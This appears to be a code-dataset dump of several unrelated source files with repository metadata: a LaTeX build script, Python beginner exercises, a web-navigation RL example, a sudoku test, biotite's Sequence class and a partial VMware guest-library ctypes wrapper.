self.binary = b
self.options = o
self.verbose = v
def run(self, settings, errmsg):
""" Run the command for the given settings.
Required settings:
- basename
- cleanfiles
:returns: Return code
"""
returncode = 1
try:
cmd = self.options.format(**settings.items())
args = shlex.split(cmd)
print("Running: "+self.binary+" "+" ".join(args))
if not dry:
returncode = check_call([self.binary] + args)
except CalledProcessError as err:
print(err)
print(sys.argv[0].split("/")[-1] + ": "+errmsg+" (exitcode "+str(err.returncode)+")", file=sys.stderr)
sys.exit(1)
return returncode
## COMMAND LINE INTERFACE ##
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def main(argv=None):
global verbose
global dry
parser = argparse.ArgumentParser(
description='''
Naive compilation script for the ADSPhD class. No file dependency checks
are performed. Use TeXnicCenter, Texmaker, latexmk, rubber, SCons or
make for such a feature.''',
epilog='''
Settings: Open run.py with a text editor and change values in the settings
definition
''')
parser.add_argument('--verbose', '-v', action='count', help='Verbose output')
parser.add_argument('--targets', '-T', action='store_true', help='Print available targets')
parser.add_argument('--dry', '-d', action='store_true', help='Dry run to see commands without executing them')
parser.add_argument('target', nargs='*', help='Targets')
args = parser.parse_args(argv)
if args.verbose is not None:
verbose = args.verbose
dry = args.dry
if args.targets:
targets()
return
initapplications()
if len(args.target) == 0:
print("No targets given, using default target: compile")
compile()
for target in args.target:
print("Target: "+target)
if target in knowntargets:
knowntargets[target]()
else:
print("Unknown target")
if __name__ == "__main__":
sys.exit(main())
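# Example usage (illustrative):
#   ./run.py            # no target given, defaults to 'compile'
#   ./run.py clean view # remove auxiliary files, then open the pdf
#   ./run.py -T         # list all available targets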
|
[
"kherim.willems@imec.be"
] |
kherim.willems@imec.be
|
72fb24a240291a432d20c7b10d1f829948019281
|
ccf324383bce0a74ef3a4eca9f277e9db89800bb
|
/Chp8/8-3_exercises.py
|
0bba55f4dd698b068f18ad00a90cd7d1a4abef43
|
[] |
no_license
|
tanktoptony/RealPython-Book1
|
825ef822cee8593bb80a95a840bda0a8214ea311
|
0c3cd79edf9e61236b0164e52d212d0bbd208c5a
|
refs/heads/master
| 2021-01-12T00:39:53.717091
| 2015-04-16T08:51:45
| 2015-04-16T08:51:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
# 1. Write a script that prompts the user to enter a word using the raw_input() function,
# stores that input in a string object, and then displays whether the length of that string
# is less than 5 characters, greater than 5 characters, or equal to 5 characters by using a
# set of if, elif and else statements.
#1
user_input = raw_input("Enter a word: ")
if len(user_input) < 5:
    print 'less than 5 characters'
elif len(user_input) > 5:
    print 'greater than 5 characters'
else:
    print 'equal to 5 characters'
|
[
"michael@mlnorman.com"
] |
michael@mlnorman.com
|
0dfb49a2afd192c3a3d067f55be0b096846c7d5a
|
8b8af2d3a8c04ab75d0b331771fa16e0bfe96301
|
/storage/csv_dictwrite.py
|
87f5899f076e23b15d8bfb31811c34902727a421
|
[] |
no_license
|
RyukerLiu/introducing-python
|
6a44b6560e0f82b1886d3359cd0b4bc21e486430
|
f902a1fa7b31cd6c1978d176fec3b1bf6bb23718
|
refs/heads/master
| 2020-05-03T01:25:10.869550
| 2019-04-02T07:20:20
| 2019-04-02T07:20:20
| 178,336,744
| 0
| 0
| null | 2019-03-29T05:13:19
| 2019-03-29T05:13:19
| null |
UTF-8
|
Python
| false
| false
| 254
|
py
|
import csv
villains = [{'first': 'Doctor', 'last': 'No'} , {'first': 'Rosa', 'last' : 'Klebb'}]
with open('villains.csv', 'wt', newline='') as fout:
csvout = csv.DictWriter(fout, ['first', 'last'])
csvout.writeheader()
csvout.writerows(villains)
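# Round-trip check (added for illustration): read the rows back with DictReader.
with open('villains.csv', 'rt', newline='') as fin:
    for row in csv.DictReader(fin):
        print(row['first'], row['last'])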
|
[
"alex03108861@yahoo.com.tw"
] |
alex03108861@yahoo.com.tw
|
f15ea5350f91db08607111b1b3da17afdb7e9df0
|
e10a6d844a286db26ef56469e31dc8488a8c6f0e
|
/compositional_rl/gwob/examples/web_environment_example.py
|
db65accda519a7ce01ec591613e7c7d0385b57be
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
Jimmy-INL/google-research
|
54ad5551f97977f01297abddbfc8a99a7900b791
|
5573d9c5822f4e866b6692769963ae819cb3f10d
|
refs/heads/master
| 2023-04-07T19:43:54.483068
| 2023-03-24T16:27:28
| 2023-03-24T16:32:17
| 282,682,170
| 1
| 0
|
Apache-2.0
| 2020-07-26T15:50:32
| 2020-07-26T15:50:31
| null |
UTF-8
|
Python
| false
| false
| 6,400
|
py
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example execution of a rule-based optimal policy on gminiwob shopping."""
import time
from absl import app
from absl import flags
from absl import logging
from CoDE import test_websites
from CoDE import utils
from CoDE import vocabulary_node
from CoDE import web_environment
flags.DEFINE_string("data_dep_path", None,
"Data dep path for local miniwob files.")
flags.DEFINE_boolean(
"run_headless_mode", False,
"Run in headless mode. On borg, this should always be true.")
flags.DEFINE_boolean(
"use_conceptual", False,
"If true, use abstract web navigation where it is assumed to known which profile field corresponds to which element."
)
FLAGS = flags.FLAGS
def run_policy_on_shopping_website():
"""Run an optimal policy on the shopping website and visualize in browser."""
# Create a generic web environment to which we will add primitives and
# transitions to create a shopping website. These parameters will work to
# observe a simple policy running but they might be insufficient in a training
# setting as observations will be converted into arrays and these parameters
# are used to shape them. In this example, they don't have that effect.
env = web_environment.GMiniWoBWebEnvironment(
base_url="file://{}/".format(FLAGS.data_dep_path),
subdomain="gminiwob.generic_website",
profile_length=5,
number_of_fields=5,
use_only_profile_key=False,
number_of_dom_elements=150,
dom_attribute_sequence_length=5,
keyboard_action_size=5,
kwargs_dict={
"headless": FLAGS.run_headless_mode,
"threading": False
},
step_limit=25,
global_vocabulary=vocabulary_node.LockedVocabulary(),
use_conceptual=FLAGS.use_conceptual)
# Create a shopping website design with difficulty = 3.
website = test_websites.create_shopping_website(3)
design = test_websites.generate_website_design_from_created_website(
website)
# Design the actual environment.
env.design_environment(
design, auto_num_pages=True)
# Make sure raw_state=True as this will return raw observations not numpy
# arrays.
state = env.reset(raw_state=True)
# Optimal sequences of elements to visit. Some might be redundant and will be
# skipped.
optimal_actions = [
"group_next_p0",
"group_username",
"group_password",
"group_rememberme",
"group_captcha",
"group_stayloggedin",
"group_next_p1",
"group_next_p2",
"group_name_first",
"group_name_last",
"group_address_line1",
"group_address_line2",
"group_city",
"group_postal_code",
"group_state",
"group_submit_p2",
]
# Corresponding pages of these elements:
# [0, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3]
reward = 0.0
logging.info("Utterance: %s", str(state.utterance))
logging.info("\n\n")
logging.info("All available primitives: %s",
str(env.get_all_actionable_primitives()))
logging.info("\n\n")
# Iterate over all optimal actions. For each action, iterate over all elements
# in the current observation. If an element matches, execute the optimal
# action and continue.
# Iterate over optimal actions.
for action in optimal_actions:
logging.info("Element at focus: %s", str(action))
# Iterate over all elements in the current observation.
# order_dom_elements returns an ordered list of DOM elements to make the
# order and elements consistent.
for i, element in enumerate(
utils.order_dom_elements(state.dom_elements, html_id_prefix=None)):
      # If the HTML id of the element matches the action, execute the action.
if element.id == action.replace("group", "actionable"):
logging.info("Acting on (%s)", str(element))
logging.info("\tAttributes of the element: %s",
str(utils.dom_attributes(element, 5)))
# Get the corresponding profile fields.
profile_keys = env.raw_profile.keys
# Execute the (element index, profile field index) action on the
# website. Environment step function accepts a single scalar action.
# We flatten the action from a tuple to a scalar which is deflattened
# back to a tuple in the step function.
if action[len("group") +
1:] in profile_keys and not FLAGS.use_conceptual:
logging.info("Profile: %s, Element ID: %s",
str(profile_keys.index(action[len("group") + 1:])),
str(action[len("group") + 1:]))
# action=element_index + profile_field_index * number_of_elements
# This is converted back into a tuple using a simple modulo
# arithmetic.
state, r, _, _ = env.step(
i + profile_keys.index(action[len("group") + 1:]) *
env.number_of_dom_elements, True)
else: # This is the case where we have abstract navigation problem.
logging.info("Element ID: %s", str(action[len("group") + 1:]))
# We don't need to convert a tuple into a scalar because in this case
# the environment expects the index of the element.
state, r, _, _ = env.step(i, True)
logging.info("Current reward: %f", r)
reward += r
if not FLAGS.run_headless_mode:
# wait 1 sec so that the action can be observed on the browser.
time.sleep(1)
break
logging.info("Final reward: %f", reward)
if not FLAGS.run_headless_mode:
# wait 30 secs so that the users can inspect the html in the browser.
time.sleep(30)
def main(argv):
if len(argv) > 1:
raise app.UsageError("Too many command-line arguments.")
run_policy_on_shopping_website()
if __name__ == "__main__":
app.run(main)
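# Example invocation (illustrative; the path depends on your local checkout,
# and absl also accepts --norun_headless_mode for the boolean flag):
#   python web_environment_example.py --data_dep_path=/path/to/gwob \
#       --run_headless_mode=false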
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
174aec0b7bfde27c24cc6abccfd345e1ef6dced6
|
48ac4b8138b490a876a2530dad1bca29f1823de5
|
/first_tests/colecciones.py
|
5c290b80eb83d6767835a388a0a42d158bb60b7a
|
[
"MIT"
] |
permissive
|
Gorwast/python-tests
|
dbb7222d6a3ccdc2de0d5ad90156f02a4ba69607
|
342605fdfa50d05c645e12c15b4db24d3f7cb7f0
|
refs/heads/master
| 2023-01-08T20:24:03.893124
| 2020-11-18T21:16:18
| 2020-11-18T21:16:18
| 272,347,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
py
|
#Collections: List
l1 = [22, True, "String", [4, 5]]
l2 = [15, 30, 45, 60]
var1 = l1[0]
print("List: ")
print(var1)
print(l2[3])
print(l2[0:2])
for elemento in l2:
print(elemento)
###Collections: Tuple
t1 = (10, False, 3.2, (2, 3))
print(type(t1))
print(type(l1))
var2 = t1[1]
print("Tuple: ")
print(t1[2])
print(var2)
###Collections: Dictionary
d1 = {'Name': 'Luis', 'Age': 21, 'Theme': 'Development'}
var3 = d1['Age']
print('Dictionary: ')
print(var3)
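# Added illustration: iterating over the dictionary's key/value pairs.
for key, value in d1.items():
    print(key, ':', value)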
|
[
"lk23@live.com.mx"
] |
lk23@live.com.mx
|
b235e47ceab2dde9ba3dcadac64258bc818f6667
|
0aa0c38985c11331b20e1d9bdeabfdcaf5dea90f
|
/ex10.py
|
c77558f62b5bebe437bd461e03d98e8d5357ebd7
|
[] |
no_license
|
dongul11/lpthw
|
5dd92278a35166e2b465aafd3e171ebc60cd4340
|
35c973e65820601b6231d001d100c06f02558adc
|
refs/heads/master
| 2021-09-22T10:06:14.775565
| 2018-09-07T17:28:43
| 2018-09-07T17:28:43
| 114,300,461
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
tabby_cat = "\tI'm tabbed in."
persian_cat = "I'm split\non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = '''
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
'''
print(tabby_cat)
print(persian_cat)
print(backslash_cat)
print(fat_cat)
|
[
"donguljack11@gmail.com"
] |
donguljack11@gmail.com
|
d7aac9af796fa2c15a1d847133e699fd19779ed9
|
63dc51b514faea7966d529440df80c4a6eab34b1
|
/src/test/TestLibSudoku.py
|
964c3f328a77ae5d348cff9cdca232b81d916c50
|
[] |
no_license
|
caviedes93/PySudoku
|
af1368dac2f0c374552710cc75132f6799b049f1
|
d67e110684526fe188436884ec51ecc89ad6c388
|
refs/heads/master
| 2020-12-25T10:59:20.442887
| 2013-07-27T22:58:19
| 2013-07-27T22:58:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
'''
Created on 26/07/2013
@author: dominik
'''
import unittest
from lib.libSudoku import get_new_board, is_board_valid
class Test(unittest.TestCase):
def testBoardCreationAndValidation(self):
for i in range(1,100):
newBoard = get_new_board()
self.assertTrue(is_board_valid(newBoard), "newly created board is not valid")
newBoard = get_new_board()
newBoard[0][0] = newBoard[2][2]
self.assertFalse(is_board_valid(newBoard), "invalid board deemed to be valid - group")
        newBoard = get_new_board()
        newBoard[0][8] = newBoard[0][0]
        self.assertFalse(is_board_valid(newBoard), "invalid board deemed to be valid - row")
        newBoard = get_new_board()
        newBoard[8][8] = newBoard[0][8]
        self.assertFalse(is_board_valid(newBoard), "invalid board deemed to be valid - col")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
[
"dominik@foop.at"
] |
dominik@foop.at
|
e0b15df612ba3b856357439a9d6586d0186b146e
|
c0c4fe8f9aff2e7684fcaf10329f963873753b2a
|
/src/biotite/sequence/sequence.py
|
1a6b8230a35cd5b6afd265692459ee224fe40473
|
[
"BSD-3-Clause"
] |
permissive
|
thomasnevolianis/biotite
|
85e1b9d6a1fbb5d9f81501a8ebc617bc26388ab9
|
916371eb602cfcacb2d5356659298ef38fa01fcc
|
refs/heads/master
| 2022-11-30T19:40:53.017368
| 2020-08-04T07:00:59
| 2020-08-04T07:00:59
| 285,375,415
| 0
| 0
|
BSD-3-Clause
| 2020-08-05T18:41:48
| 2020-08-05T18:41:47
| null |
UTF-8
|
Python
| false
| false
| 11,010
|
py
|
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
"""
The module contains the :class:`Sequence` superclass and :class:`GeneralSequence`.
"""
__name__ = "biotite.sequence"
__author__ = "Patrick Kunzmann"
__all__ = ["Sequence"]
import numbers
import abc
import numpy as np
from .alphabet import Alphabet, LetterAlphabet
from ..copyable import Copyable
_size_uint8 = np.iinfo(np.uint8 ).max +1
_size_uint16 = np.iinfo(np.uint16).max +1
_size_uint32 = np.iinfo(np.uint32).max +1
class Sequence(Copyable, metaclass=abc.ABCMeta):
"""
The abstract base class for all sequence types.
A :class:`Sequence` can be seen as a succession of symbols, that are
elements in the allowed set of symbols, the :class:`Alphabet`.
Internally, a :class:`Sequence` object uses a *NumPy*
:class:`ndarray` of integers, where each integer represents a
symbol.
The :class:`Alphabet` of a :class:`Sequence` object is used to
encode each symbol, that is used to create the
:class:`Sequence`, into an integer. These integer values are called
symbol code, the encoding of an entire sequence of symbols is
called sequence code.
The size of the symbol code type in the array is determined by the
size of the :class:`Alphabet`:
If the :class:`Alphabet` contains 256 symbols or less, one byte is
used per array element; if the :class:`Alphabet` contains
between 257 and 65536 symbols, two bytes are used, and so on.
Two :class:`Sequence` objects are equal if they are instances of the
same class, have the same :class:`Alphabet` and have equal sequence
codes.
Comparison with a string or list of symbols evaluates always to
false.
A :class:`Sequence` can be indexed by any 1-D index a
:class:`ndarray` accepts.
If the index is a single integer, the decoded symbol at that
position is returned, otherwise a subsequence is returned.
Individual symbols of the sequence can also be exchanged in indexed
    form: If an integer is used as index, the item is treated as a
symbol. Any other index (slice, index list, boolean mask) expects
multiple symbols, either as list of symbols, as :class:`ndarray`
containing a sequence code or another :class:`Sequence` instance.
Concatenation of two sequences is achieved with the '+' operator.
Each subclass of :class:`Sequence` needs to overwrite the abstract
method :func:`get_alphabet()`, which specifies the alphabet the
:class:`Sequence` uses.
Parameters
----------
sequence : iterable object, optional
The symbol sequence, the :class:`Sequence` is initialized with.
For alphabets containing single letter strings, this parameter
may also be a :class`str` object.
By default the sequence is empty.
Attributes
----------
code : ndarray
The sequence code.
symbols : list
The list of symbols, represented by the sequence.
The list is generated by decoding the sequence code, when
this attribute is accessed. When this attribute is modified,
the new list of symbols is encoded into the sequence code.
alphabet : Alphabet
The alphabet of this sequence. Cannot be set.
Equal to `get_alphabet()`.
Examples
--------
Creating a DNA sequence from string and print the symbols and the
code:
>>> dna_seq = NucleotideSequence("ACGTA")
>>> print(dna_seq)
ACGTA
>>> print(dna_seq.code)
[0 1 2 3 0]
>>> print(dna_seq.symbols)
['A' 'C' 'G' 'T' 'A']
>>> print(list(dna_seq))
['A', 'C', 'G', 'T', 'A']
Sequence indexing:
>>> print(dna_seq[1:3])
CG
>>> print(dna_seq[[0,2,4]])
AGA
>>> print(dna_seq[np.array([False,False,True,True,True])])
GTA
Sequence manipulation:
>>> dna_copy = dna_seq.copy()
>>> dna_copy[2] = "C"
>>> print(dna_copy)
ACCTA
>>> dna_copy = dna_seq.copy()
>>> dna_copy[0:2] = dna_copy[3:5]
>>> print(dna_copy)
TAGTA
>>> dna_copy = dna_seq.copy()
>>> dna_copy[np.array([True,False,False,False,True])] = "T"
>>> print(dna_copy)
TCGTT
>>> dna_copy = dna_seq.copy()
>>> dna_copy[1:4] = np.array([0,1,2])
>>> print(dna_copy)
AACGA
Reverse sequence:
>>> dna_seq_rev = dna_seq.reverse()
>>> print(dna_seq_rev)
ATGCA
Concatenate the two sequences:
>>> dna_seq_concat = dna_seq + dna_seq_rev
>>> print(dna_seq_concat)
ACGTAATGCA
"""
def __init__(self, sequence=()):
self.symbols = sequence
def copy(self, new_seq_code=None):
"""
Copy the object.
Parameters
----------
new_seq_code : ndarray, optional
If this parameter is set, the sequence code is set to this
value, rather than the original sequence code.
Returns
-------
copy
A copy of this object.
"""
# Override in order to achieve better performance,
# in case only a subsequence is needed,
# because not the entire sequence code is copied then
clone = self.__copy_create__()
if new_seq_code is None:
clone.code = np.copy(self.code)
else:
clone.code = new_seq_code
self.__copy_fill__(clone)
return clone
@property
def symbols(self):
return self.get_alphabet().decode_multiple(self.code)
@symbols.setter
def symbols(self, value):
alph = self.get_alphabet()
dtype = Sequence._dtype(len(alph))
self._seq_code = alph.encode_multiple(value, dtype)
@property
def code(self):
return self._seq_code
@code.setter
def code(self, value):
dtype = Sequence._dtype(len(self.get_alphabet()))
if not isinstance(value, np.ndarray):
raise TypeError("Sequence code must be an integer ndarray")
self._seq_code = value.astype(dtype, copy=False)
@property
def alphabet(self):
return self.get_alphabet()
@abc.abstractmethod
def get_alphabet(self):
"""
Get the :class:`Alphabet` of the :class:`Sequence`.
This method must be overwritten, when subclassing
:class:`Sequence`.
Returns
-------
alphabet : Alphabet
:class:`Sequence` alphabet.
"""
pass
def reverse(self):
"""
Reverse the :class:`Sequence`.
Returns
-------
reversed : Sequence
The reversed :class:`Sequence`.
Examples
--------
>>> dna_seq = NucleotideSequence("ACGTA")
>>> dna_seq_rev = dna_seq.reverse()
>>> print(dna_seq_rev)
ATGCA
"""
reversed_code = np.flip(np.copy(self._seq_code), axis=0)
reversed = self.copy(reversed_code)
return reversed
def is_valid(self):
"""
Check, if the sequence contains a valid sequence code.
A sequence code is valid, if at each sequence position the
code is smaller than the size of the alphabet.
Invalid code means that the code cannot be decoded into
symbols. Furthermore invalid code can lead to serious
errors in alignments, since the substitution matrix
is indexed with an invalid index.
Returns
-------
valid : bool
True, if the sequence is valid, false otherwise.
"""
return (self.code < len(self.get_alphabet())).all()
def get_symbol_frequency(self):
"""
        Get the number of occurrences of each symbol in the sequence.
        If a symbol does not occur in the sequence, but it is in the
        alphabet, its number of occurrences is 0.
        Returns
        -------
        frequency : dict
            A dictionary containing the symbols as keys and the
            corresponding number of occurrences in the sequence as
values.
"""
frequencies = {}
for code, symbol in enumerate(self.get_alphabet()):
frequencies[symbol] = len(np.nonzero((self._seq_code == code))[0])
return frequencies
def __getitem__(self, index):
alph = self.get_alphabet()
sub_seq = self._seq_code.__getitem__(index)
if isinstance(sub_seq, np.ndarray):
return self.copy(sub_seq)
else:
return alph.decode(sub_seq)
def __setitem__(self, index, item):
alph = self.get_alphabet()
if isinstance(index, numbers.Integral):
# Expect a single symbol
code = alph.encode(item)
else:
# Expect multiple symbols
if isinstance(item, Sequence):
code = item.code
elif isinstance(item, np.ndarray):
code = item
else:
# Default: item is iterable object of symbols
code = alph.encode_multiple(item)
self._seq_code.__setitem__(index, code)
def __len__(self):
return len(self._seq_code)
def __iter__(self):
alph = self.get_alphabet()
i = 0
while i < len(self):
yield alph.decode(self._seq_code[i])
i += 1
def __eq__(self, item):
if not isinstance(item, type(self)):
return False
if self.get_alphabet() != item.get_alphabet():
return False
return np.array_equal(self._seq_code, item._seq_code)
def __str__(self):
alph = self.get_alphabet()
if isinstance(alph, LetterAlphabet):
return alph.decode_multiple(self._seq_code, as_bytes=True)\
.tobytes().decode("ASCII")
else:
return "".join(alph.decode_multiple(self._seq_code))
def __add__(self, sequence):
if self.get_alphabet().extends(sequence.get_alphabet()):
new_code = np.concatenate((self._seq_code, sequence._seq_code))
new_seq = self.copy(new_code)
return new_seq
elif sequence.get_alphabet().extends(self.get_alphabet()):
new_code = np.concatenate((self._seq_code, sequence._seq_code))
new_seq = sequence.copy(new_code)
return new_seq
else:
raise ValueError("The sequences alphabets are not compatible")
@staticmethod
def _dtype(alphabet_size):
if alphabet_size <= _size_uint8:
return np.uint8
elif alphabet_size <= _size_uint16:
return np.uint16
elif alphabet_size <= _size_uint32:
return np.uint32
else:
return np.uint64
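# Illustrative sketch (added; not part of the module): the smallest possible
# concrete subclass simply fixes an alphabet. Biotite itself provides
# GeneralSequence for this purpose, so this stays commented out.
#
# class DigitSequence(Sequence):
#     _alphabet = Alphabet([str(i) for i in range(10)])
#
#     def get_alphabet(self):
#         return DigitSequence._alphabet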
|
[
"patrick.kunzm@gmail.com"
] |
patrick.kunzm@gmail.com
|
9bdfba61deccc4c6699bd54280a7728fb4b4069a
|
9612c53a9e666ba10510962a833a55fb7553be7b
|
/getDataSafir/jsonToCsv.py
|
6a2c199030293c790470a6ac6c375484ec09da6f
|
[] |
no_license
|
raksmeyny/big-data
|
04098ed6fc6c51e9643c2dba0ee30f4c38d143ce
|
1222edd5ca59a3d04ad3ac4dd444bea4cfd727e6
|
refs/heads/master
| 2021-01-10T04:53:57.905212
| 2016-03-14T04:15:14
| 2016-03-14T04:15:14
| 52,132,443
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
import csv
import json
with open('comment.json') as infile:
    comments = json.load(infile)
print comments
with open('data.csv', 'a') as f:
    csvfile = csv.writer(f)
    for item in comments:
        csvfile.writerow([item["date"], item["comment"], item["link"], item["likes"]])
# f = csv.writer(open("comment.csv", "w+"))
# f.writerow(["date", "comment", "link", "likes"])
# for x in x:
# f.writerow([x["date"],
# x["comment"],
# x["link"],
# x["likes"]])
|
[
"raksmey.ny"
] |
raksmey.ny
|
8c5ffaaa66db4fcbb98cfd663e36037edaa8163a
|
abaa806550f6e6e7bcdf71b9ec23e09a85fe14fd
|
/data/global-configuration/packs/vmware/collectors/vmguestlib.py
|
eb9e2dabd67d95667afa30dc59ee76accdf5f3c7
|
[
"MIT"
] |
permissive
|
naparuba/opsbro
|
02809ddfe22964cd5983c60c1325c965e8b02adf
|
98618a002cd47250d21e7b877a24448fc95fec80
|
refs/heads/master
| 2023-04-16T08:29:31.143781
| 2019-05-15T12:56:11
| 2019-05-15T12:56:11
| 31,333,676
| 34
| 7
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,971
|
py
|
### This program is free software; you can redistribute it and/or
### modify it under the terms of the GNU General Public License
### as published by the Free Software Foundation; either version 2
### of the License, or (at your option) any later version.
###
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
###
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
### Copyright 2013-2014 Dag Wieers <dag@wieers.com>
from ctypes import *
from ctypes.util import find_library
__author__ = 'Dag Wieers <dag@wieers.com>'
__version__ = '0.1.2'
__version_info__ = tuple([int(d) for d in __version__.split('.')])
__license__ = 'GNU General Public License (GPL)'
# TODO: Implement support for Windows and MacOSX, improve Linux support ?
if find_library('vmGuestLib'):
vmGuestLib = CDLL(find_library('vmGuestLib'))
elif find_library('guestlib'):
vmGuestLib = CDLL(find_library('guestlib'))
# elif os.path.exists('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so'):
# vmGuestLib = CDLL('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so')
# elif os.path.exists('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll'):
# vmGuestLib = CDLL('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll')
else:
    raise Exception('ERROR: Cannot find vmGuestLib library in LD_LIBRARY_PATH')
VMGUESTLIB_ERROR_SUCCESS = 0
VMGUESTLIB_ERROR_OTHER = 1
VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM = 2
VMGUESTLIB_ERROR_NOT_ENABLED = 3
VMGUESTLIB_ERROR_NOT_AVAILABLE = 4
VMGUESTLIB_ERROR_NO_INFO = 5
VMGUESTLIB_ERROR_MEMORY = 6
VMGUESTLIB_ERROR_BUFFER_TOO_SMALL = 7
VMGUESTLIB_ERROR_INVALID_HANDLE = 8
VMGUESTLIB_ERROR_INVALID_ARG = 9
VMGUESTLIB_ERROR_UNSUPPORTED_VERSION = 10
VMErrors = (
'VMGUESTLIB_ERROR_SUCCESS',
'VMGUESTLIB_ERROR_OTHER',
'VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM',
'VMGUESTLIB_ERROR_NOT_ENABLED',
'VMGUESTLIB_ERROR_NOT_AVAILABLE',
'VMGUESTLIB_ERROR_NO_INFO',
'VMGUESTLIB_ERROR_MEMORY',
'VMGUESTLIB_ERROR_BUFFER_TOO_SMALL',
'VMGUESTLIB_ERROR_INVALID_HANDLE',
'VMGUESTLIB_ERROR_INVALID_ARG',
'VMGUESTLIB_ERROR_UNSUPPORTED_VERSION',
)
VMErrMsgs = (
'The function has completed successfully.',
'An error has occurred. No additional information about the type of error is available.',
'The program making this call is not running on a VMware virtual machine.',
'The vSphere Guest API is not enabled on this host, so these functions cannot be used. For information about how to enable the library, see "Context Functions" on page 9.',
'The information requested is not available on this host.',
'The handle data structure does not contain any information. You must call VMGuestLib_UpdateInfo to update the data structure.',
'There is not enough memory available to complete the call.',
'The buffer is too small to accommodate the function call. For example, when you call VMGuestLib_GetResourcePoolPath, if the path buffer is too small for the resulting resource pool path, the function returns this error. To resolve this error, allocate a larger buffer.',
'The handle that you used is invalid. Make sure that you have the correct handle and that it is open. It might be necessary to create a new handle using VMGuestLib_OpenHandle.',
'One or more of the arguments passed to the function were invalid.',
'The host does not support the requested statistic.',
)
class VMGuestLibException(Exception):
    '''Status code that indicates success or failure. Each function returns a
VMGuestLibError code. For information about specific error codes, see "vSphere
Guest API Error Codes" on page 15. VMGuestLibError is an enumerated type
defined in vmGuestLib.h.'''
def __init__(self, errno):
self.errno = errno
self.GetErrorText = vmGuestLib.VMGuestLib_GetErrorText
self.GetErrorText.restype = c_char_p
self.message = self.GetErrorText(self.errno)
self.strerr = VMErrMsgs[self.errno]
def __str__(self):
return '%s\n%s' % (self.message, self.strerr)
class VMGuestLib(Structure):
def __init__(self):
        # Reference to virtual machine data. VMGuestLibHandle is defined in vmGuestLib.h.
self.handle = self.OpenHandle()
self.UpdateInfo()
# Unique identifier for a session. The session ID changes after a virtual machine is
# migrated using VMotion, suspended and resumed, or reverted to a snapshot. Any of
# these events is likely to render any information retrieved with this API invalid. You
# can use the session ID to detect those events and react accordingly. For example, you
# can refresh and reset any state that relies on the validity of previously retrieved
# information.
# Use VMGuestLib_GetSessionId to obtain a valid session ID. A session ID is
# opaque. You cannot compare a virtual machine session ID with the session IDs from
# any other virtual machines. You must always call VMGuestLib_GetSessionId after
# calling VMGuestLib_UpdateInfo.
# VMSessionID is defined in vmSessionId.h
self.sid = self.GetSessionId()
def OpenHandle(self):
'''Gets a handle for use with other vSphere Guest API functions. The guest library
handle provides a context for accessing information about the virtual machine.
Virtual machine statistics and state data are associated with a particular guest library
handle, so using one handle does not affect the data associated with another handle.'''
if hasattr(self, 'handle'):
return self.handle
else:
handle = c_void_p()
ret = vmGuestLib.VMGuestLib_OpenHandle(byref(handle))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return handle
def CloseHandle(self):
'''Releases a handle acquired with VMGuestLib_OpenHandle'''
if hasattr(self, 'handle'):
ret = vmGuestLib.VMGuestLib_CloseHandle(self.handle.value)
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
del (self.handle)
def UpdateInfo(self):
'''Updates information about the virtual machine. This information is associated with
the VMGuestLibHandle.
VMGuestLib_UpdateInfo requires similar CPU resources to a system call and
therefore can affect performance. If you are concerned about performance, minimize
the number of calls to VMGuestLib_UpdateInfo.
If your program uses multiple threads, each thread must use a different handle.
Otherwise, you must implement a locking scheme around update calls. The vSphere
Guest API does not implement internal locking around access with a handle.'''
ret = vmGuestLib.VMGuestLib_UpdateInfo(self.handle.value)
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
def GetSessionId(self):
'''Retrieves the VMSessionID for the current session. Call this function after calling
VMGuestLib_UpdateInfo. If VMGuestLib_UpdateInfo has never been called,
VMGuestLib_GetSessionId returns VMGUESTLIB_ERROR_NO_INFO.'''
sid = c_void_p()
ret = vmGuestLib.VMGuestLib_GetSessionId(self.handle.value, byref(sid))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return sid
def GetCpuLimitMHz(self):
        '''Retrieves the upper limit of processor use in MHz available to the virtual
machine. For information about setting the CPU limit, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
